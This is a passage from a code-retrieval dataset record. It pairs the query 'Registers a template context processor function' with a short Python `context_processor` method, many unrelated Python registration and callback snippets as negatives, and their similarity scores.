dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def add_done_callback(self, fn):\n if self.done():\n # self._loop.call_soon(fn,self)\n call_soon(fn, self)\n else:\n self._callbacks.append(fn)", "def add_default_done_callback(self, fn):\n\n self._default_done_callbacks.append(fn)", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' % name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def register_func_list(self, func_and_handler):\n for func, handler in func_and_handler:\n self._function_dispatch.register(func, handler)\n self.dispatch.cache_clear()", "def rpc_deferred(func):\n decorator = rpc_call(func)\n decorator.rpc_deferred = True\n return decorator", "def register_handler(self, method, path, fn):\n if not(method in self.handlers):\n self.handlers[method] = {}\n self.handlers[method][path] = fn", "def register_callback(self, callback):\n self.callbacks.add(callback)", "def add(self, method: str, pattern: str, handler: Callable) -> None:", "def register_to_event(request):\n pass", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def on_exit(self, function):\n\t\tself.exit_functions += [function]", "def hook(callback):\n hooks.append(callback)", "def add_done_callback(self, fn):\n if self.done():\n fn(self)\n else:\n self._callbacks.append(fn)", "def register_prometheus(app: Flask, registry=REGISTRY) -> None:\n\n def after(response: Response) -> Response:\n endpoint = _get_endpoint()\n status_code = _get_status_code(response)\n\n # TODO (1): count the number of calls by Flask endpoint and status_code\n\n return response\n\n def _get_endpoint() -> Optional[str]:\n \"\"\"\n Extracts the endpoint from a Flask request.\n :return: Flask endpoint.\n \"\"\"\n if request.endpoint is None:\n return None\n return request.endpoint.split(\".\")[-1]\n\n def _get_status_code(response: Response) -> int:\n \"\"\"\n Extracts the HTTP status code from a Flask response.\n :param response: Flask response.\n :return: HTTP status code.\n \"\"\"\n status_code = response.status_code\n if isinstance(status_code, HTTPStatus):\n return status_code.value\n else:\n return status_code\n\n # Flask will execute the `after` function after serving each request\n app.after_request(after)", "def on_register(self, response):\n print('You have been registered!')\n self.on_auth(response)", "def onRegister(setup_state):\n\tblueprint = setup_state.blueprint\n\t#if setup_state.options.get('auth') == True:\n\tif setup_state.url_prefix.startswith('/ext/'): #not really used right now\n\t\t#inside here, 'route' works but not 'before_request'\n\t\t#maybe use to register authentication-specific routes?\n\t\tprint(\"Authenticated API on {}\".format(setup_state.url_prefix))", "def post_init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing post_init_func %s more than once.' % fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__post_init_functions__.append(wrapper_fn)\n return wrapper_fn", "def on_shutdown(self):\n\n def decorator(coro):\n self._hooks.append((\"shutdown\", coro))\n return coro\n\n return decorator", "def register_callback(self):\n raise Exception('not implemented')", "def register_post_exec_callback(action_logger):\n logging.debug(\"Adding %s to post execution callback\", action_logger)\n __post_exec_callbacks.append(action_logger)", "def on_register(cls):", "def register_callback(self, callback: Callable[[], None]) -> None:\r\n print(\"register callback called\")\r\n self._callbacks.add(callback)", "def registerHTTPPostCallbacks():\n libxml2mod.xmlRegisterHTTPPostCallbacks()", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def post_runroute_callable(self, request):\n return None", "def multiprocess_callback(self, func):\n\n self.mul_func_map[func.__name__] = func", "def on_loaded(self, func):\n self._on_loaded_funcs.append(func)", "def append_function(self, extra_function):\n assert extra_function.name != self.name, \\\n 'Name of the remote function should be different'\n for func in self.appended_functions:\n assert extra_function.name != func.name, \\\n 'Cannot append functions with the same name'\n self.appended_functions.append(extra_function)", "def register_handler(self, method, handler):\n self.handlers[method] = handler", "def after_worker_stop(func):\n _func_only(func)\n worker_methods_db.register_after_stop(func)\n return func", "def after_request(response):\n request_latency = time.time() - request._prometheus_metrics_request_start_time\n METRICS_REQUEST_LATENCY.labels(request.method, request.path).observe(\n request_latency\n )\n METRICS_REQUEST_COUNT.labels(\n request.method, request.path, response.status_code\n ).inc()\n return response", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def observe(self, fn):\n self.observers.append(fn)\n return fn", "def hook_server_before_exec(self, request_event):\r\n\r\n for functor in self._hooks['server_before_exec']:\r\n functor(request_event)", "def after_request(response):\n # TODO: Send log reports to a monitor service such as DataDog?\n return response", "def register( self, pattern, callback ):\n self.patterns.append((pattern, callback))", "def register(cls, claim_func):\n def _deco(serializer):\n cls._registered.insert(0, (claim_func, serializer))\n return serializer\n return _deco", "def register_callback(self, callback):\n self._callbacks.append(callback)", "def register_async_callback(self, async_callback):\n self._async_callbacks.append(async_callback)", "def register(self, callback, filters = []):\n\t\tself.callbacks.append((callback, filters))\n\t\tself.events[str(callback)] = []", "def hook_client_after_request(self, request_event, reply_event, exception=None):\r\n for functor in self._hooks['client_after_request']:\r\n functor(request_event, reply_event, exception)", "def register_callback(func): \n \n VoiceService.add_callback(func.__name__, func) \n\n return func", "def restipy(callback,\n pre_call=lambda env,sr,args,kwargs: None,\n post_call=lambda env,sr,call_ret: None):\n _func_table[callback.__name__] = (callback, pre_call, post_call)", "def async_register_scan_request_callback(\n self,\n _callback: CALLBACK_TYPE,\n ) -> CALLBACK_TYPE:\n self._request_callbacks.append(_callback)\n\n @hass_callback\n def _async_remove_callback() -> None:\n self._request_callbacks.remove(_callback)\n\n return _async_remove_callback", "def decorator(fn):\n @functools.wraps(fn)\n def result(*args, **kwargs):\n request_time = datetime.datetime.now()\n actual_response = fn(*args, **kwargs)\n request = bottle.request\n response = bottle.response\n # modify this to log exactly what you need:\n logger.info('%s %s %s %s %s', request.remote_addr,\n request_time,\n request.method,\n request.url,\n response.status)\n logger.info('Cookies: %s', request.get_cookie('login'))\n logger.info('Handeled by: \"%s\" in file: \"%s\"', fn.__name__, SCRIPT_NAME)\n\n return actual_response\n return result", "def register(self, event_name, callback_func, priority=50, identifier=None,\n method=EVENT_BUBBLE):\n if event_name in self.events:\n self.events[event_name].add(callback_func, priority, identifier,\n method)\n else:\n self.events[event_name] = HandlerList(callback_func, priority,\n identifier, method)", "def after_get_hook(self):\n pass", "def register_route(app):\n\n @app.teardown_appcontext\n def teardown_session(e):\n \"\"\"\n Exit the context of my_db and OT_spider when app's context is teared down.\n :param e: event.\n :return: None.\n \"\"\"\n my_db.close()\n OT_spider.close()\n\n @app.errorhandler(404)\n def page_not_found(e):\n \"\"\"\n Render assigned template when error code 404 occurs.\n :param e: error event.\n :return: error/404.html.\n \"\"\"\n return render_template(\"error/404.html\"), 404\n\n @app.errorhandler(403)\n def access_forbidden(e):\n \"\"\"\n Render assigned template when error code 403 occurs.\n :param e: error event.\n :return: error/403.html.\n \"\"\"\n return render_template(\"error/403.html\"), 403\n\n @app.errorhandler(500)\n def internal_server_error(e):\n \"\"\"\n Render assigned template when error code 500 occurs.\n :param e: error event.\n :return: error/500.html.\n \"\"\"\n return render_template(\"error/500.html\"), 500\n\n @app.before_request\n def filter_request():\n \"\"\"\n Intercept requests with disallowed methods and/or fake user agent.\n :return: None.\n \"\"\"\n if request.method not in ALLOWED_METHODS:\n return \"Method Not Allowed\", 405\n ua = str(request.user_agent)\n if \"Mozilla\" not in ua or \"Gecko\" not in ua:\n return \"No Scrappers!\", 403\n\n @app.after_request\n def set_res_headers(response):\n \"\"\"\n Set headers to all responses.\n :param response: flask.wrappers.Response object.\n :return: response to send back to client.\n \"\"\"\n response.headers[\"Server\"] = \"OurTieba\"\n response.headers[\"X-Content-Type-Options\"] = \"nosniff\"\n response.headers[\"X-Frame-Options\"] = \"sameorigin\"\n if app.config.get(\"ENABLE_CSP\"):\n response.headers[\"Content-Security-Policy\"] = \"script-src \" + \" \".join(WHITELIST) + \"; object-src 'self'\"\n return response\n\n @app.template_filter(\"index_format\")\n def add_zeros(i, length): # format index in photos.html\n \"\"\"\n Pad zeros to i, and turn it into a string. The length is at least 2. Used in photos.html.\n :param i: int. Integer to pad.\n :param length: int. Base integer.\n :return: A padded string.\n\n For example,\n add_zeros(1, 2) -> \"01\";\n add_zeros(1, 12) -> \"01\";\n add_zeros(13, 101) -> \"013\".\n \"\"\"\n return (\"{:0>\" + str(max(len(str(length)), 2)) + \"d}\").format(i)", "def add_callback(self, fn):\n self._callbacks.append(fn)\n return self", "def add_handler(handler_list, handler_function):\n if not handler_function in handler_list:\n handler_list.append(handler_function)", "def add_close_handler(self, func):\n if func not in self._close_handlers:\n self._close_handlers.append(func)", "def global_response_interceptor(self):\n # type: () -> Callable\n def wrapper(process_func):\n if not callable(process_func):\n raise SkillBuilderException(\n \"Global Response Interceptor process_func input \"\n \"parameter should be callable\")\n\n class_attributes = {\n \"process\": (\n lambda self, handler_input, response: process_func(\n handler_input, response))\n }\n\n response_interceptor = type(\n \"ResponseInterceptor{}\".format(\n process_func.__name__.title().replace(\"_\", \"\")),\n (AbstractResponseInterceptor,), class_attributes)\n\n self.add_global_response_interceptor(\n response_interceptor=response_interceptor())\n return process_func\n return wrapper", "def register(target: str, response_callback: Callable[[str, str],\n Optional[str]],\n status_callback: Optional[Callable[[int, str], None]] = None,\n xml_encoding: str = \"UTF-8\") -> None:\n ...", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def register( key, obj ):\n global callbacks\n callbacks[ key ] = obj", "def do_after(self):\r\n pass" ]
[ "0.7849521", "0.7643819", "0.7643819", "0.75291634", "0.62461793", "0.618368", "0.61611503", "0.61363375", "0.6126715", "0.61173093", "0.6038293", "0.5960427", "0.5939071", "0.5817307", "0.57547176", "0.57469493", "0.57465345", "0.573892", "0.56387985", "0.5626159", "0.56247324", "0.55933654", "0.5586124", "0.5586124", "0.5585159", "0.5543857", "0.55187714", "0.5512837", "0.5504014", "0.5504014", "0.5499303", "0.5495606", "0.5480781", "0.5472376", "0.5456569", "0.54551446", "0.5454601", "0.54316705", "0.542411", "0.5410469", "0.5410469", "0.54050696", "0.53801686", "0.53775203", "0.53754723", "0.5374642", "0.53654814", "0.5343876", "0.5328724", "0.5325684", "0.5316061", "0.5314407", "0.53132135", "0.5290579", "0.52817804", "0.5281538", "0.528061", "0.52771395", "0.5276198", "0.527508", "0.5252302", "0.52437794", "0.5233006", "0.5229276", "0.5220394", "0.52148765", "0.52094555", "0.5208067", "0.5207617", "0.52042335", "0.5203948", "0.5194774", "0.51917034", "0.5190002", "0.51681215", "0.5163194", "0.5161892", "0.515913", "0.51523817", "0.51460755", "0.5144199", "0.5138099", "0.51328814", "0.5128381", "0.5125532", "0.51215416", "0.51143086", "0.5106884", "0.51010907", "0.508884", "0.5088234", "0.50834584", "0.50709194", "0.50690526", "0.50674903", "0.50604767", "0.50604004", "0.50548875", "0.5054521", "0.5052002" ]
0.79526246
0
Registers a template context processor function.
def context_processor(self, f): self.template_context_processors.append(f) return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def test_enable_extension_registers_context_processors(self):\n class TestExtension(Extension):\n context_processors = ['my_custom_processor']\n\n # Back up the list, so we can replace it later.\n if hasattr(settings, 'TEMPLATES'):\n orig_context_processors_list = \\\n list(settings.TEMPLATES[0]['OPTIONS']['context_processors'])\n else:\n orig_context_processors_list = \\\n list(settings.TEMPLATE_CONTEXT_PROCESSORS)\n\n # Sanity-check that the context processor didn't wind up in here.\n self.assertNotIn('my_custom_processor', orig_context_processors_list)\n\n try:\n extension = self.setup_extension(TestExtension)\n\n # We have to re-fetch these lists now, since they may have\n # been normalized to lists.\n if hasattr(settings, 'TEMPLATES'):\n context_processors_list = \\\n settings.TEMPLATES[0]['OPTIONS']['context_processors']\n else:\n context_processors_list = \\\n settings.TEMPLATE_CONTEXT_PROCESSORS\n\n # This should have been added, since the extension was enabled.\n self.assertIn('my_custom_processor', context_processors_list)\n\n # Shutting down the extension should remove the context\n # processor.\n self.manager.disable_extension(extension.id)\n self.assertNotIn('my_custom_processor',\n context_processors_list)\n finally:\n if hasattr(settings, 'TEMPLATES'):\n settings.TEMPLATES[0]['OPTIONS']['context_processors'] = \\\n orig_context_processors_list\n else:\n settings.TEMPLATE_CONTEXT_PROCESSORS = \\\n orig_context_processors_list", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def make_processor(cls, fnc):\n #def wrapper(**kw):\n # name = fnc.__name__\n # fnc.__name__ = 'run'\n # return type()\n # pass", "def register_template_renderer(\n self, plugin, template_name, context=default_context\n ):\n self._renderers[plugin] = (template_name, context)", "def context_processors(self):\n return [\n 'leonardo.module.web.processors.page.add_page_if_missing',\n 'leonardo.module.web.processors.config.leonardo',\n 'leonardo.module.web.processors.font.webfont_cookie',\n ]", "def register(func):\n PLUGINS[func.__name__] = func\n return func", "def add_processor(self, termprocessor):\n self.pipeline.append(termprocessor)", "def register(self, prim, fn):\n assert prim not in self.mapping\n self.mapping[prim] = fn", "def add_macro_context(self, name: str, context: dict = None):\r\n if context is None:\r\n context = dict()\r\n self.macros[name].add_instance(dict())", "def register(prim):\n def deco(fn):\n vm_register(prim)(lambda vm, *args: fn(*args))\n return py_register(prim)(fn)\n return deco", "def register(func):\n plugins[func.__name__] = func\n return func", "def register():\n \n global _registered\n if not _registered:\n _registered = True\n sys.path_hooks.insert(0, VFSImporter)", "def get_render_fn(self):\n def render(environment, ctxt_data, file_path):\n \"Renders a jinja2 template\"\n logging.debug(\"Rendering with context data %s\", ctxt_data)\n\n template = environment.get_template(file_path)\n return template.render(**ctxt_data)\n return render", "def add_preprocess_callback(self, name, func, *args, **kwargs):\n\n self.preprocess[name] = (func, args, kwargs)", "def template_extra_functions(self):\n\t\treturn []", "def render_template():\n template_engine = engines['django']\n def func(template_string):\n load_tags_string = '{% load wagtailextensions_tags %}'\n return template_engine.from_string(load_tags_string + template_string).render()\n return func", "def process(f: ProcessFunction) -> ProcessFunction:\n process_registry_040.add_function(f)\n process_registry_100.add_function(f)\n return f", "def template_function2(self, node, ordered_functions):\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n\n new._generated = \"cxx_template\"\n\n new.cxx_template = {}\n # fmt.CXX_template = targs.instantiation # ex. <int>\n\n # self.push_instantiate_scope(new, targs)\n\n if new.ast.template_argument:\n iast = getattr(self.instantiate_scope, new.ast.template_argument)\n new.ast = new.ast.instantiate(node.ast.instantiate(iast))\n # Generics cannot differentiate on return type\n new.options.F_create_generic = False\n\n # Replace templated arguments.\n newparams = []\n for arg in new.ast.declarator.params:\n if arg.template_argument:\n iast = getattr(self.instantiate_scope, arg.template_argument)\n newparams.append(arg.instantiate(iast))\n else:\n newparams.append(arg)\n new.ast.declarator.params = newparams\n # self.pop_instantiate_scope()\n\n # Do not process templated node, instead process\n # generated functions above.\n node.wrap.clear()", "def render_inclusion(func, file_name, takes_context, django_context, *args, **kwargs):\r\n\r\n if takes_context:\r\n args = [django_context] + list(args)\r\n\r\n _dict = func(*args, **kwargs)\r\n if isinstance(file_name, Template):\r\n t = file_name\r\n elif not isinstance(file_name, basestring) and is_iterable(file_name):\r\n t = select_template(file_name)\r\n else:\r\n t = get_template(file_name)\r\n\r\n nodelist = t.nodelist\r\n\r\n new_context = Context(_dict)\r\n csrf_token = django_context.get('csrf_token', None)\r\n if csrf_token is not None:\r\n new_context['csrf_token'] = csrf_token\r\n\r\n return nodelist.render(new_context)", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'Person': person,\n 'Movie': movie,\n 'Actors': actors,\n 'Writers': writers,\n 'Directors': directors,\n 'Genres': genres\n }\n\n app.shell_context_processor(shell_context)", "def register_entrypoints(self):\n for entrypoint in entrypoints.get_group_all(\"mlflow.run_context_provider\"):\n try:\n self.register(entrypoint.load())\n except (AttributeError, ImportError) as exc:\n warnings.warn(\n 'Failure attempting to register context provider \"{}\": {}'.format(\n entrypoint.name, str(exc)\n ),\n stacklevel=2\n )", "def Map(context, funcname, *nodesets):\n (prefix, local) = ExpandQName(funcname, namespaces=context.processorNss)\n func = (g_extFunctions.get(expanded) or\n CoreFunctions.CoreFunctions.get(expanded, None))\n if not func:\n raise Exception('Dynamically invoked function %s not found.'%funcname)\n flist = [f]*len(nodesets)\n lf = lambda x, f, *args: apply(f, args)\n retlist = apply(map, (lf, flist) + nodesets)\n\n proc = context.processor\n result_nodeset = []\n for ret in retlist:\n proc.pushResult()\n proc.writers[-1].text(Conversions.StringValue(ret))\n frag = proc.popResult()\n context.rtfs.append(frag)\n result_nodeset.append(frag.childNodes[0])\n return result_nodeset", "def env_reg_deco(func):\n envelopes[str(func.__name__)] = func\n return func", "def register_render_tag(renderer):\n def tag(parser, token):\n class TagNode(template.Node):\n def render(self, context):\n return renderer(context, token)\n return TagNode()\n for copy_attr in (\"__dict__\", \"__doc__\", \"__name__\"):\n setattr(tag, copy_attr, getattr(renderer, copy_attr))\n return register.tag(tag)", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def push_context(self, ctx):\n self._tpl_context = ctx", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def preprocessor(f):\n f._is_preprocessor = True\n return staticmethod(f)", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def add_func(self, transmute_func, transmute_context):\n swagger_path = transmute_func.get_swagger_path(transmute_context)\n for p in transmute_func.paths:\n self.add_path(p, swagger_path)", "def register_callback(self, priority, f, with_request, render=None):\n if self.component is not None:\n return self.component.register_callback(self.model or None, priority, f, with_request, render)\n\n return ''", "def register(name, fn=None):\n def _hook_add(func):\n if name not in _hooks:\n logger.debug(\"Creating new hook %s\" % name)\n _hooks[name] = []\n\n logger.debug('Registering hook %s for function %s' % (name, fn))\n _hooks[name].append(func)\n\n if fn is None:\n # Behave like a decorator\n def decorator(func):\n _hook_add(func)\n return func\n return decorator\n else:\n # Behave like a function, just register hook\n _hook_add(fn)", "def inst_set_cpu_template_ext_fxt(request):\n return request.param", "def uses_template(template):\n def wrapper(func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n template_path = template\n ctx = func(*args, **kwargs)\n if type(ctx) is dict:\n try:\n return render_template(template_path,\n inators=ctx['inators'])\n except KeyError:\n try:\n return render_template(template_path,\n inator=ctx['inator'])\n except KeyError:\n return render_template(template_path, inators=ctx)\n else:\n return ctx\n return wrapped\n return wrapper", "def register(dmm, typecls):\n def wraps(fn):\n dmm.register(typecls, fn)\n return fn\n\n return wraps", "def register_function_compilation(self, func, compilation_cbk, listclass):\n self.compilations_function[func] = {\n 'callback': compilation_cbk,\n 'listclass': listclass\n }", "def macro(self, func):\r\n self.register_macro(func.__name__)\r\n\r\n def wrapper(*args, **kwargs):\r\n old = func.__globals__.copy()\r\n for key in self.current_context.keys():\r\n del func.__globals__[key]\r\n\r\n if not self.loaded:\r\n self.add_macro_context(func.__name__)\r\n self.switch_context(self.macros[func.__name__].get_last_instance())\r\n self.parse_labels(getsource(func))\r\n\r\n else:\r\n self.switch_context(self.macros[func.__name__].get_next_instance())\r\n\r\n func.__globals__.update(self.current_context)\r\n func(*args, **kwargs)\r\n func.__globals__.clear()\r\n func.__globals__.update(old)\r\n\r\n self.restore_context()\r\n\r\n wrapper.original = func.original if hasattr(func, 'original') else func\r\n return wrapper", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n \"db\": db,\n \"User\": account.models.User,\n \"Product\": product.models.Product,\n \"Order\": order.models.Order,\n }\n\n app.shell_context_processor(shell_context)", "def register_shell_context(app):\n from .extensions import db\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {'db': db, }\n\n app.shell_context_processor(shell_context)", "def register(self, *args):\n def decorate(f):\n if not len(args) == 1:\n full = f.__name__\n else:\n full = args[0]\n\n # Gather some informations about the arguments of the function, to\n # display them in help() and check for the min / max number of\n # arguments on call.\n spec = inspect.getargspec(f)\n fargs = spec.args if spec.args else []\n nbr_args = len(fargs)\n nbr_filled = len(spec.defaults) if spec.defaults else 0\n reqs = fargs[:nbr_args-nbr_filled+1]\n adds = fargs[nbr_args-nbr_filled+1:]\n\n info = {\n 'function' : f,\n 'required' : reqs,\n 'additional': adds,\n }\n\n self.actions[full] = info\n return f\n return decorate", "def _add_template(self, alias, template):\n # Construct a function that will do substitution for any placeholders\n # in the template.\n def fname(**kwargs):\n return _substitute(template, self.files(), kwargs)\n\n # Bind the fname function to this instance of FileNames\n self.__dict__[alias] = fname", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\"db\": db, \"User\": user.models.User, \"AnalysisRequest\": engine.models.AnalysisRequest}\n\n app.shell_context_processor(shell_context)", "def registerSLPlugin(self, tag, handler_fn):\n self.sl_plugins[tag] = handler_fn", "def registerMLPlugin(self, tag, handler_fn):\n self.ml_plugins[tag] = handler_fn", "def callback( context ):\n return '<tag>{}</tag>'.format( function( context ) )", "def pre_processor(self):", "def make_processing_functions(self):\n return", "def make_command_register(collector):\n\n def _register(*args, name=None):\n a_transform = _transform(*args)\n return collector.register(transform=a_transform, name=name)\n\n return _register", "def register(name, templating=True):\n if name in _plugins:\n return\n import template\n _plugins.append(name)\n\n if templating:\n path = os.path.normpath(os.path.join(\n os.path.dirname(monkey.__file__),\n '../plugins/%s/templates' % name))\n template.add_template_path(path)\n template.add_template_path(path, prefix=name)", "def register_function(self, *args):\n if len(args) == 1:\n function = args[0]\n try:\n name = function.fact_name\n except AttributeError:\n name = function.__name__\n if name is None:\n raise Exception(\"Function does not have a name\")\n else:\n name, function = args\n self.functions[name] = function", "def render_index(request, *args, **kwargs):\n # add context_instance keyword\n kwargs.update(\n {'context_instance': RequestContext(request, processors=[custom_proc])})\n\n return render(request, *args, **kwargs)", "def register_template(self, name, template):\n key = name, len(template.args)\n existing = self.templates.get(key)\n if existing:\n raise mio.MIOException('The template \"%s/%d\" is already registered' % (name, len(template.args)))\n self.templates[key] = template", "def add_renderer_globals(event):\n def fake_url(controller=None, action=None, **kwargs):\n if action == \"css\":\n return \"/css\"\n if action and controller:\n path = {}\n for key in 'name', 'pocket', 'subpath':\n if key in kwargs:\n path[key] = kwargs.pop(key)\n path['_query'] = dict((k,v) for k,v in kwargs.items() if v is not None)\n return request.route_path(controller+\"/\"+action, **path)\n if controller and controller.startswith(\"/\"):\n return controller\n return \"/unknown\"\n\n def fake_url_current(**kwargs):\n path = {}\n # XXX request.matchdict?\n if 'name' in kwargs:\n path['name'] = kwargs.pop('name')\n if 'action' in kwargs:\n path['_route_name'] = 'dex/'+kwargs.pop('action')\n path['_query'] = dict((k,v) for k,v in kwargs.items() if v is not None)\n return request.current_route_path(**path)\n\n def fake_translate(message, plural=None, n=None, context=None, comment=None):\n return unicode(message)\n\n renderer_globals = event\n request = event.get(\"request\") #or threadlocal.get_current_request()\n if not request:\n return\n config = request.registry.settings\n renderer_globals[\"config\"] = config\n renderer_globals[\"h\"] = splinehelpers\n renderer_globals[\"r\"] = request\n renderer_globals[\"c\"] = request.tmpl_context\n #renderer_globals[\"url\"] = request.url_generator\n renderer_globals[\"url\"] = fake_url\n fake_url.current = fake_url_current\n renderer_globals[\"_\"] = fake_translate\n renderer_globals[\"flash\"] = lib.Flash(request.session)\n\n request.tmpl_context.links = config['spline.plugins.links']\n\n # start timer\n request.tmpl_context.timer = lib.ResponseTimer()", "def _instantiate_attributes_before_function(self, context=None):\n self._instantiate_pathway(context=context)\n # super(Process_Base, self)._instantiate_function(context=context)", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def render(self, source: str, context: dict):\n\n # Creating new class which will be used as a template context.\n context_class = type('RenderContext', (Context,), {})\n\n # All callable objects in context.\n helpers = {}\n\n for key, value in context.items():\n\n # Install each callable object as a context class property.\n if callable(value):\n setattr(context_class, 'helper_' + key, Helper(value))\n helpers[key] = value\n\n # Helper function is run only when context dict has it name as a key.\n # Use template context class to create dict.\n render_context = context_class(context)\n\n result = pystache.render(source, render_context)\n\n return result", "def register(self, filter_name, filter_func):\n self._filters[filter_name] = filter_func", "def add_function (self, module, name) :\n setattr (module, name, self._wrapped (module, name))", "def register_shell_context(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\"db\": db, \"User\": User}\n\n app.shell_context_processor(shell_context)", "def register(self, format, serfunc):\n if not isinstance(serfunc, func):\n raise TypeError(\"Serializer.register(): serfunc is not a function: \"+\n str(func))\n self._map[format] = serfunc", "def register(self, *types, **kwargs):\n\n def _(func):\n trace_func = trace(func)\n TwoLevelDispatcher.register(self, *types, **kwargs)(trace_func)\n # return func instead trace_func here so that\n # chained register didn't get wrapped multiple\n # times\n return func\n\n return _", "def get_template_context_processors(exclude=(), append=(),\n current={'processors': TEMPLATE_CONTEXT_PROCESSORS}):\n\n current['processors'] = tuple(\n [p for p in current['processors'] if p not in exclude]\n ) + tuple(append)\n\n return current['processors']", "def templated(template=None):\n def decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n # Run the view\n ctx = f(*args, **kwargs)\n # Create a context if needed\n if ctx is None:\n ctx = {}\n # Or return exotic value. A redirect for example\n elif not isinstance(ctx, dict):\n return ctx\n # Compute the template name if needed\n template_name = template\n if template_name is None:\n template_name = request.endpoint.replace('.', '/') + '.html'\n # Render\n return render_template(template_name, **ctx)\n return decorated_function\n return decorator", "def register_shell_context(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'User': user.models.User,\n 'UserProfile': profile.models.UserProfile,\n }\n\n app.shell_context_processor(shell_context)", "def test_register_template(self):\n pass", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'User': user.models.User}\n\n app.shell_context_processor(shell_context)", "def register(f):\n\tshapes[f.__name__] = f\n\treturn f", "def register(app, fn):\n\n @functools.wraps(fn)\n def config_route(**kwargs):\n \"\"\"\n :param kwargs: str, id of existing entry\n :return: dict or exception\n \"\"\"\n\n return fn(app.config, **kwargs)\n\n app.route(*fn.route_args, **fn.route_kwargs)(config_route)", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'session': db.session,\n }\n\n app.shell_context_processor(shell_context)", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {\n 'db': db,\n 'User': User}\n\n app.shell_context_processor(shell_context)", "def add_renderer_globals(event):\n request = event.get('request')\n if request is None:\n request = get_current_request()\n globs = {\n 'url': route_url,\n 'h': None,\n 'a_url': request.application_url,\n 'user': authenticated_userid(request),\n 'repo': Repo(request.registry.settings.get('git_repo', '.'))\n }\n if request is not None:\n tmpl_context = request.tmpl_context\n globs['c'] = tmpl_context\n globs['tmpl_context'] = tmpl_context\n try:\n globs['session'] = request.session\n except ConfigurationError:\n pass\n event.update(globs)", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def render_in_context(context, template, local_context=None):\n\n if context is None:\n context = Context()\n\n if not hasattr(template, \"render\"): # Quacks like a template?\n try:\n engine = context.template.engine\n except AttributeError:\n engine = Engine.get_default()\n\n if isinstance(template, (list, tuple)):\n template = engine.select_template(template)\n else:\n template = engine.get_template(template)\n\n with context.push(local_context):\n return template.render(context)", "def register(name, inputhook):\n registered[name] = inputhook", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' % name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def register(operation_key, *param_keys):\n\n def decorator(operation_fn):\n _operations[operation_key] = Operation(operation_fn, param_keys)\n return operation_fn\n\n return decorator", "def register_topi_compute(task_name, func=None):\n\n def _decorate(topi_compute):\n @functools.wraps(topi_compute)\n @_register_task_compute(task_name)\n def wrapper(*args, **kwargs):\n \"\"\"wrapper function for topi compute\"\"\"\n assert not kwargs, \"Do not support kwargs in template function call\"\n task_env = TaskExtractEnv.current\n if task_env is not None and task_env.tracing:\n task_env.add_task(task_name, args)\n workload = args_to_workload(args, task_name)\n tgt = Target.current()\n 